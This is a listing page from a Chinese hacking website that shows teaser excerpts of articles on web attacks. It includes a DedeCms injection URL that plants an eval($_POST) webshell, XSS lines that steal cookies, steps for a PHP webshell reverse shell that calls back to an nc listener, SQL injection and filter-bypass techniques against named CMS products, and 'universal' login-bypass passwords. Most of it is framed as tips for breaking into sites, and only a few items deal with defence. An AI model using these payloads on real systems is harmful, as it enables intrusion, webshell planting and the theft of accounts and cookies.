内容字号:默认大号超大号

段落设置:段首缩进取消段首缩进

字体设置:切换到微软雅黑切换到宋体

  • 速破解无线路由器密码的全过程04月25日

    笔记本取代台式机已经是不争的事实。笔记本最重要的功能之一就是可以支持Wi-Fi无线上网,无论高端的迅驰2还是低端的上网本都100%的内置了无线网卡。同时,无线路由器也不再高贵,便宜的只需要100多块钱,可以说无线上网的门槛已经大大降低。无线上网最大的优

    Tags:黑客攻击与防范
  • 科讯kesion 6.x – 7.06 SQL 注射漏洞VBS版利用工具第二版04月25日

    我就随便改进了下,希望用的到的朋友可以收藏。 第二版改进: 1.检测2条漏洞 2.解决access数据库也出现什么差异备份等脚本上需要优化的问题。 其他也没什么了。 本文转载自『半坑土农民's Blog』 科讯kesion 6.x 7.06 SQL VBS Exp 第二版

    Tags:脚本攻击与防范
  • DedeCms注入漏洞 影响版本5.3、5.5Posted in php04月23日

    假设域名是:www.abc.com 攻击步骤如下: 1. 访问网址: http://www.abc.com/plus/digg_frame.php?action=goodid=1024%651024mid=*/eval($_POST[x]);var_dump(3);? 可看见以下错误信息 注入成功 2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到

    Tags:黑客攻击与防范
  • ECSHOP php商城系统过滤不严导致SQL注入漏洞04月23日

    影响版本: ECSHOP 2.7.2 Release 0604 程序介绍: ECSHOP是一款开源免费的网上商店系统。由专业的开发团队升级维护,为您提供及时高效的技术支持,您还可以根据自己的商务特征对ECSHOP进行定制,增加自己商城的特色功能。 漏洞分析: 在include_libcommon.php中

    Tags:脚本攻击与防范
  • 渗透服务器 绕过防注入文件04月22日

    一般通用过滤字符串的关键字有以下这些: and | select | update | chr | delete | %20from | ; | insert | mid | master. | set | = 而这里最难处理的就是select这个关键字了,那么我们怎样来突破他们呢?问题虽未完全解决,但还是说出来与大家分享一下,希

    Tags:黑客攻击与防范
  • DEDECMS网站管理系统模板执行漏洞(影响版本v5.6)04月22日

    影响版本: DEDECMS v5.6 Final 程序介绍: DedeCms 基于PHP+MySQL的技术开发,支持Windows、Linux、Unix等多种服务器平台,从2004年开始发布第一个版本开始,至今已经发布了五个大版本。DedeCms以简单、健壮、灵活、开源几大特点占领了国内CMS的大部份市场,目

    Tags:脚本攻击与防范
  • 个人主机 入侵网络攻击的步骤04月21日

    个人主机入侵网络攻击的步骤 第一步:隐藏自已的位置 为了不在目的主机上留下自己的IP地址,防止被目的主机发现,老练的攻击者都会尽 量通过跳板或肉鸡展开攻击。所谓肉鸡通常是指,HACK实现通过后门程序控制 的傀儡主机,通过肉鸡开展的扫描及攻击,即便被发

    Tags:黑客攻击与防范
  • 网站被SQL注入防范(WebKnight)04月21日

    网站被成功注入,网站一些页面被插入了下载病毒的代码,经查: 生产服务器的代码没有任何被改动过的迹象,排除服务器被入侵,代码被篡改的可能; 有病毒下载代码的部分,在数据库里真实看到了篡改迹象,可以排除ARP欺骗的可能; 同上,能确定网站被SQL注入攻

    Tags:脚本攻击与防范
  • 黑客入侵常用的新型万能登陆密码04月20日

    对于过滤了单引号或者做了post防注入的 站点,此方法也无能为力了;但对于很多对登陆端没做处理的网站,此方法值得一试,尤其是你已经知道源码了却不能执行命令(ACCESS数据库)或者对方能 报错( MYSQL数据库)。 首先我们回顾下老的万能密码or漏洞的实现机制,

    Tags:黑客攻击与防范
  • 手工注入方法,方便大家测试程序漏洞04月20日

    1、加入单引号 提交, 结果:如果出现错误提示,则该网站可能就存在注入漏洞。 2、数字型判断是否有注入; 语句:and 1=1 ;and 1=2 (经典)、' and '1'=1(字符型) 结果:分别返回不同的页面,说明存在注入漏洞. 分析:and 的意思是和如果没有过滤我们的语句,and

    Tags:脚本攻击与防范
  • php+mysql5半自动注入工具图文教程04月19日

    基本上可以应付所有的php+mysql5的注入环境,因为自己可以直接修改注入语句,所以只要手工能绕过的过滤,该工具都可以。而且我添加了最新使用group_concat获取数据的方式,可以大大降低注入时提交的语句量和获取数据的时间。先看看界面吧: 注入界面应该都能

    Tags:黑客攻击与防范
  • XSS漏洞报告04月19日

    一、什么是XSS XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的。XSS属于被动式的攻击,因为其被动且不好利用,所以

    Tags:脚本攻击与防范
  • 巧用Cacls.exe命令来修改文件访问控制权限04月18日

    Cacls filename [/T] [/E] [/C] [/G user:perm] [/R user [...]] [/P user:perm [...]] [/D user [...]] Filename显示访问控制列表(以下简称ACL); /T更改当前目录及其所有子目录中指定文件的 ACL; /E 编辑 ACL 而不替换; /C在出现拒绝访问错误时继续; /G

    Tags:黑客攻击与防范
  • XSS 攻击常用脚本04月18日

    1、这个应该都知道 scriptalert(test)/script 常用于测试 是否存在跨站 2、scriptwindow.alert(document.cookie);/script 这句代码将会弹出壹个包含有浏览者cookie信息的对话框,如果用户已经通过帐号登陆网站,在显示的cookie信息中将会包含有用户的账户名和

    Tags:脚本攻击与防范
  • PHP Webshell 下的端口反弹方法04月17日

    使用方法:需要将以下代码保存为一个单独的php文件。上传到服务器之后,本地NC监听一个端口,在代码里设置好反弹IP和端口,然后直接访问上传的php文件,就会给 NC 弹回来一个shell。 测试实例:先在本地执行 nc -vv -l -p port,然后访问这个php页面 http://

    Tags:脚本攻击与防范
  • SQL 手工注射原理小结04月16日

    一些常用的sql注入语句。下面我将介绍如何使用手工注入MYSQL,MSSQL数据库. 一般漏洞产生的原因 : 程序执行中未对敏感字符进行过滤,使得攻击者传入恶意字符串与结构化数据查询语句合并,并且执行恶意代码. 创建text数据表MYSQL代码: 复制代码 代码如下: create

    Tags:黑客攻击与防范
  • 万博企业网站管理系统注入漏洞(MemberLogin.asp)04月16日

    这两天拿站的时候,好几回都遇到个叫万博的企业管理系统,今天有时间就下载过来看了看,找到了个注入漏洞,郁闷的是,得手工,没法用工具,累人的事。因为已经找到了一个,我就没兴趣接着往下看了。 这个注入漏洞发生在html/MemberLogin.asp文件里,在Include

    Tags:脚本攻击与防范
  • dedecms v5.1/5.5 两处跨站漏洞的修复办法04月15日

    影响版本: dedecmsCMS V5.5 截止2010-03-18 17:50之前下载的所有版本,包含GBK和UTF-8版本 漏洞描述: 北洋贱队(http://bbs.seceye.org)首发 demo1:http://www.dedecms.com/plus/search.php?keyword=%22%3E%3Ciframe%20src=http://www.gohack.org%3Esearch

    Tags:黑客攻击与防范
  • PJBlog3 V3.2.8.352文件Action.asp修改任意用户密码04月15日

    发布日期:2011-06.19 发布作者:佚名 影响版本:PJBlog3 V3.2.8.352 漏洞类型:设计错误 漏洞描述:PJBlog一套开源免费的中文个人博客系统程序,采用asp+Access的技术,具有相当高的运作效能以及更新率,也支持目前Blog所使用的新技术 在文件Action.asp中:

    Tags:脚本攻击与防范
  • SQL注入中获取数据的一些技巧分析04月13日

    一、MSSQL获取数据: 用的比较多的就是for xml raw了,MSSQL2000都支持的! 注入中显示数据的两个办法均可以使用,一是union select、二是显错,以MSSQL2005为例: 复制代码 代码如下:select username from members where 1=2 union select top 3 username f

    Tags:黑客攻击与防范

Copyright © 2002-2016 dngsw.cn 电脑高手网 版权所有

粤ICP备13005586号-3